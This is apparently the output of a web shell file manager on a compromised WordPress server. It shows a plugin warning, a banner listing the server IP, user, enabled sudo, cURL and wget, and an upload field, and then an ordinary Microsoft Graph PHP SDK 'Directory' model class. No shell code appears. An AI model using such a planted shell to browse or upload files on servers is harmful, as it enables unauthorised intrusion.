Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/thread-self/cwd/vendor/microsoft/microsoft-graph/src/Model/ |
Upload File : |
<?php
/**
* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
*
* Directory File
* PHP version 7
*
* @category Library
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
namespace Microsoft\Graph\Model;
/**
* Directory class
*
* @category Model
* @package Microsoft.Graph
* @copyright (c) Microsoft Corporation. All rights reserved.
* @license https://opensource.org/licenses/MIT MIT License
* @link https://graph.microsoft.com
*/
class Directory extends Entity
{
/**
* Gets the administrativeUnits
* Conceptual container for user and group directory objects.
*
* @return array|null The administrativeUnits
*/
public function getAdministrativeUnits()
{
if (array_key_exists("administrativeUnits", $this->_propDict)) {
return $this->_propDict["administrativeUnits"];
} else {
return null;
}
}
/**
* Sets the administrativeUnits
* Conceptual container for user and group directory objects.
*
* @param AdministrativeUnit[] $val The administrativeUnits
*
* @return Directory
*/
public function setAdministrativeUnits($val)
{
$this->_propDict["administrativeUnits"] = $val;
return $this;
}
/**
* Gets the attributeSets
* Group of related custom security attribute definitions.
*
* @return array|null The attributeSets
*/
public function getAttributeSets()
{
if (array_key_exists("attributeSets", $this->_propDict)) {
return $this->_propDict["attributeSets"];
} else {
return null;
}
}
/**
* Sets the attributeSets
* Group of related custom security attribute definitions.
*
* @param AttributeSet[] $val The attributeSets
*
* @return Directory
*/
public function setAttributeSets($val)
{
$this->_propDict["attributeSets"] = $val;
return $this;
}
/**
* Gets the customSecurityAttributeDefinitions
* Schema of a custom security attributes (key-value pairs).
*
* @return array|null The customSecurityAttributeDefinitions
*/
public function getCustomSecurityAttributeDefinitions()
{
if (array_key_exists("customSecurityAttributeDefinitions", $this->_propDict)) {
return $this->_propDict["customSecurityAttributeDefinitions"];
} else {
return null;
}
}
/**
* Sets the customSecurityAttributeDefinitions
* Schema of a custom security attributes (key-value pairs).
*
* @param CustomSecurityAttributeDefinition[] $val The customSecurityAttributeDefinitions
*
* @return Directory
*/
public function setCustomSecurityAttributeDefinitions($val)
{
$this->_propDict["customSecurityAttributeDefinitions"] = $val;
return $this;
}
/**
* Gets the deletedItems
* Recently deleted items. Read-only. Nullable.
*
* @return array|null The deletedItems
*/
public function getDeletedItems()
{
if (array_key_exists("deletedItems", $this->_propDict)) {
return $this->_propDict["deletedItems"];
} else {
return null;
}
}
/**
* Sets the deletedItems
* Recently deleted items. Read-only. Nullable.
*
* @param DirectoryObject[] $val The deletedItems
*
* @return Directory
*/
public function setDeletedItems($val)
{
$this->_propDict["deletedItems"] = $val;
return $this;
}
/**
* Gets the federationConfigurations
* Configure domain federation with organizations whose identity provider (IdP) supports either the SAML or WS-Fed protocol.
*
* @return array|null The federationConfigurations
*/
public function getFederationConfigurations()
{
if (array_key_exists("federationConfigurations", $this->_propDict)) {
return $this->_propDict["federationConfigurations"];
} else {
return null;
}
}
/**
* Sets the federationConfigurations
* Configure domain federation with organizations whose identity provider (IdP) supports either the SAML or WS-Fed protocol.
*
* @param IdentityProviderBase[] $val The federationConfigurations
*
* @return Directory
*/
public function setFederationConfigurations($val)
{
$this->_propDict["federationConfigurations"] = $val;
return $this;
}
/**
* Gets the onPremisesSynchronization
* A container for on-premises directory synchronization functionalities that are available for the organization.
*
* @return array|null The onPremisesSynchronization
*/
public function getOnPremisesSynchronization()
{
if (array_key_exists("onPremisesSynchronization", $this->_propDict)) {
return $this->_propDict["onPremisesSynchronization"];
} else {
return null;
}
}
/**
* Sets the onPremisesSynchronization
* A container for on-premises directory synchronization functionalities that are available for the organization.
*
* @param OnPremisesDirectorySynchronization[] $val The onPremisesSynchronization
*
* @return Directory
*/
public function setOnPremisesSynchronization($val)
{
$this->_propDict["onPremisesSynchronization"] = $val;
return $this;
}
}